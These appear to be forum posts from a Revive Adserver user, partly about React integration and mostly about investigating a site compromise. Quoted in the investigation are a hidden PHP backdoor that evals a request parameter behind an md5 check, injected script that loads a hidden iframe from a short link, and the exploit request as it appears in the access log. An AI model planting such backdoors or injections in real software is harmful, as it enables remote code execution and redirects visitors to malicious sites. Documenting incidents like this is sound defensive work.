sunech

Over the weekend my progress so far, is that I ruled out getting the spcjs to work - and moved on to the asyncjs implementation. Here I can display banners correctly, but I am having problems getting them to reload on page changes, despite the React component being re-rendered. Upon url change I am calling window.reviveAsync.REVIVEID.refresh(), but unfortunately the banner does not refresh. When I run it manually in the console it just returns undefined. I also tried calling reviveAsync.REVIVEID.apply(reviveAsync.REVIVEID.detect()), that I found in another thread, but it also just returns undefined. When exploring window.reviveAsync.REVIVEID in the console, it does have refresh/apply/detect properties though, so it seems weird that they are returning undefined? I I only call window.reviveAsync.REVIVEID.apply() it does not return undefined, but instead the error below: asyncjs.php?ts=1645982770238:1 Uncaught TypeError: Cannot read properties of undefined (reading 'zones') at Object.apply (asyncjs.php?ts=1645982770238:1:1712) at <anonymous>:1:53 Anyone have any input on what I might be doing wrong, or how they implemented Revive with React?

Is anyone using Revive with a single page application based on React? or aware of whether or not it will work out of the box? Would like to be able to use Revives single page call and ad zones initiated from different React component, but not sure how to implement it - and nothing appears to come up when searching for the Revive / React combination.

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now: if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);} Thank you for your assistance! I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation. @Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

@Matteo Beccati just to confirm, are you saying my plugins/bannerTypeText/oxText/genericText.delivery.php is compromised as well? If so, is there anywhere I can download the original file? It does not appear to be included in the stable release at the Revive website, so I assume Revive downloads the plugin somehow during the initial setup? It seems odd that this has have been compromised though, as far as I can see the file has not been changed since August 4 when the Revive installation was set up.

Sure thing - just sent you an e-mail to the address listed on your personal site.

Please see below: <?php /* +---------------------------------------------------------------------------+ | Revive Adserver | | http://www.revive-adserver.com | | | | Copyright: See the COPYRIGHT.txt file. | | License: GPLv2 or later, see the LICENSE.txt file. | +---------------------------------------------------------------------------+ */ /** * This is autogenerated file which contains all files from the "delivery_dev" * folder of Revive Adserver merged into a single output file. On systems * without a PHP opcode cache that is configured to not regularly check for * file updates, this autogenerated file can dramatically improve the * performance of Revive Adserver's delivery engine. * * !!!Warning!!! * * Do not edit this file. If you need to do any changes to any delivery file, * check out the source code from GitHub; make the necessary changes to the * file(s) in the "delivery_dev" folder; and regenerate the delivery files * using the script located in the "scripts/delivery" directory. */ if (empty($_GET['script'])) { exit(1); } include_once '../../init-delivery.php'; $script = str_replace("\0", '', $_GET['script']); $aPluginId = explode(':', $script); $scriptFileName = MAX_PATH . rtrim($conf['pluginPaths']['plugins'], '/') . '/' . implode('/', $aPluginId) . '.delivery.php'; if (stristr($scriptFileName, '../') || stristr($scriptFileName, '..\\') || !is_readable($scriptFileName) || !is_file($scriptFileName)) { if (empty($conf['debug']['production'])) { echo "Unable to find delivery script ({$scriptFileName}) for specified plugin-component-identifier: {$script}"; } exit(1); } include $scriptFileName; The file does not appear to have been modified, since the rest of the files in my Revive installation. I am not a PHP programmer unfortunately, but could it be some kind of missing validation that allows a POST request to execute foreign PHP code, via the include at the end?

I just had time to investigate a bit now. As Ian suggests, code has been prepended in rv_zones. All my zones have had the following code added: <style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script> I do not know when this has happended, but given the timing of Snaggys post, the user report I received being within a couple of hours of it and no security vulnerabilities being known, I assume it is very recent. If I search my access logs for POST requests and filter off 403/404 responses plus our own IP addresses, the only interesting POST I come up with is this: [03/Jan/2019:20:38:48 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.0" 200 352 "https://google.com/serach?q=https://myadserverurl.com/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)" The IP of the request belongs to an OVH server, not Google, and it is the only request I have from this IP address. Does anyone have any input?

FYI i just found this thread by a user reporting virus on our site, as they on iphone/ipad get redirected to mobile2018newmine .pw as well. I have not had time to investigate yet, but we also run Revive so I suspect this is the same as your issue. Have you made any conclusions since your post yesterday? We are using Revive Adserver v4.1.4 and our /admin/ directory is IP restricted by Apache, so if this is a bug, it appears to be in the public-facing part of Revive.